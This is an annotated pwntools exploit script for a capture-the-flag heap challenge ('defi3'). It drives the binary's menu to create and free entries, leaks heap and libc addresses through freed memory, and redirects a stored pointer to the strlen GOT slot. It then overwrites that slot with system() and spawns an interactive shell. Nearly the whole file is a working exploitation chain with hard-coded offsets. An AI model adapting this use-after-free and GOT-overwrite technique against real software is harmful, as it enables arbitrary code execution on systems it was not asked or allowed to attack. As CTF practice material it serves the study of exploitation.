DGSE challenge defi3 - heap
#!/usr/bin/python | |
from pwn import * | |
r = process("./defi3")  # spawn the challenge binary as a local child process; every helper below drives this handle
def allocate(nom, idx):
    """Drive menu option 1 of the target: send the option number, then *nom* and *idx*.

    Each argument is written verbatim as its own line to the process handle ``r``;
    nothing is read back here, so any prompt text stays in the receive buffer.
    """
    # Menu choice "1" followed by the two fields the program asks for, in order.
    for line in ("1", nom, idx):
        r.sendline(line)
def show():
    """Select menu option 2 and return the target's output up to the next "faire ?" prompt.

    One pending read is consumed and discarded first (presumably the leftover prompt
    from the previous action), so the returned buffer starts at this option's output.
    Returns the raw received data; ``recvuntil`` keeps the delimiter, so the buffer
    ends with "faire ?".
    """
    r.recv()  # drop whatever the process already wrote
    r.sendline("2")
    return r.recvuntil("faire ?")
def free(idx, tofree):
    """Drive menu option 3 of the target: send the option number, then *idx* and *tofree*.

    Both fields are written verbatim as separate lines to ``r``; what the program does
    with the second field is not visible from this script.
    """
    # Menu choice "3" followed by the two fields the program asks for, in order.
    for line in ("3", idx, tofree):
        r.sendline(line)
def edit(nmorid, idx, data):
    """Rewrite one field of entry *idx* with *data* via menu option 4 ("nom") or 5 ("id").

    *nmorid* selects the menu option; for any other value no option line is sent at
    all, but *idx* and *data* are still written, matching the original behaviour.
    """
    option = {"nom": "4", "id": "5"}.get(nmorid)
    if option is not None:
        r.sendline(option)
    r.sendline(idx)
    r.sendline(data)
# Stage 1: shape the heap. Three entries are created through menu option 1; the third
# one uses 48-byte fields ("EEEEEEEE"*6 / "FFFFFFFF"*6) where the first two use 8 bytes,
# so it lands in a different allocator size class than the others (inferred - confirm).
print "[+] CHUNCKS CREATED "
allocate("AAAAAAAA","BBBBBBBB")
allocate("CCCCCCCC","DDDDDDDD")
allocate("EEEEEEEE"*6,"FFFFFFFF"*6)
r.recv()
pause()  # pwntools pause(): blocks until the operator continues, so the process state can be inspected here
# Stage 2: release entries 1 and 0 via menu option 3. The second field ("2") is passed
# through as-is; its meaning in the target's menu is not visible from this script.
print "[+] CHUNK FREEd"
free("1","2")
free("0","2")
# Stage 3: heap address disclosure. Option 2 is invoked after the frees and its output is
# parsed as "<label>: <value>\n..." (split on ": " then on "\n"); the first value is taken
# as a 4-byte little-endian pointer (u32 expects exactly 4 bytes). That the display still
# shows the freed entries' contents - i.e. a read of freed memory in the target - is
# inferred from this parsing; confirm against the binary. A display that cleared or
# refused freed entries would deny this leak.
print "[+] HEAP LEAK .. DONE"
heapleak = show()
HEAP = u32(heapleak.strip().split(": ")[1].split("\n")[0])
HEAP_BASE = HEAP - 0x15c0  # hard-coded distance from the leaked pointer to the heap start; only valid for this exact binary/run layout
print "[+] HEAP LEAK : ",hex(HEAP)
print "[+] HEAP BASE : ",hex(HEAP_BASE)
# Stage 4: pointer redirection. Option 4 rewrites entry 0's "nom" field with a packed
# heap address (HEAP_BASE+0x1520, another hard-coded offset), then a new entry whose
# name is the 3 raw bytes 0x30 0x20 0x60 is created. Per the original comment this
# leaves a stored pointer aimed at the strlen slot of the binary's GOT (the bytes read
# as 0x602030 little-endian, which presumably means a non-PIE binary - confirm). The
# later write through that pointer also requires the GOT to be writable, i.e. the
# binary is presumably not linked with full RELRO; full RELRO would block Stage 6.
edit("nom","0",p32(HEAP_BASE+0x1520))
allocate("\x30\x20\x60","RRRRRRRR") #overwrite pointer to strlen GOT
r.recv()
# Stage 5: libc address disclosure. show() now prints what the redirected pointer
# refers to - per the variable name, the resolved address of strlen. It is parsed the
# same way as the heap leak but treated as a 64-bit value: the printed bytes are
# right-padded with NULs to 8 bytes for u64 (a printed address stops at its first NUL,
# so fewer than 8 bytes arrive).
libcleak = show()
LIBC_strlen =u64(libcleak.strip().split(": ")[1].split("\n")[0].ljust(8,"\x00"))
LIBC_base = LIBC_strlen - 0x8b720  # presumably strlen's offset inside this particular libc build; hard-coded and build-specific
LIBC_system= LIBC_base + 0x45390  # system()'s offset in the same build, per the variable name; changes with the libc version
print "[+] LIBC LEAK : ",hex(LIBC_strlen)
print "[+] LIBC BASE : ",hex(LIBC_base)
# Stage 6: GOT overwrite. p64() packs the address little-endian; [:-3] keeps the low
# 5 bytes and a literal 0x7f byte is appended, giving a 6-byte payload - presumably to
# reproduce a 0x00007f... user-space address without sending the two leading NUL bytes,
# which the line-oriented input could not carry. The write goes through entry 0's
# redirected "nom" pointer (see the original comment). After that, per the same
# comment, the target's strlen calls reach system(); the "sh" line is the input that is
# presumably passed to it (confirm which code path in the binary calls strlen on it).
pld =p64(LIBC_system)[:-3]+"\x7f"
edit("nom","0",pld) # overwrite strlen GOT to system()
r.sendline("sh")
r.interactive()  # hand stdin/stdout of the child over to the terminal